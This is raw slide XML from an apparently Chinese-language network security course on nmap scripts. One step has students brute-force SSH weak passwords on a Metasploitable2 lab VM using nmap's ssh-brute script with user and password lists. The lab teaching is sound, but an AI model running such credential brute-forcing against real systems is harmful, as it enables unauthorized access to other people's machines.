            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8017510" y="1941830"/>
            <a:ext cx="4016375" cy="3175635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209915" y="5157470"/>
            <a:ext cx="3823970" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-9 分析Wireshark抓取的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SSH弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386070" y="831850"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在之前的扫描中可以发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploitable2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶机还开启了SSH服务，下面利用这台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploitable2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶机进行SSH登录弱密码破解，运行命令“nmap -p 22 --script=ssh-brute --script-args userdb=./user,passdb=./password 192.168.172.131”，如图2-3-10所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386070" y="2585085"/>
            <a:ext cx="5276850" cy="3038475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386070" y="5623560"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-10 进行SSH登录弱密码破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SSH弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
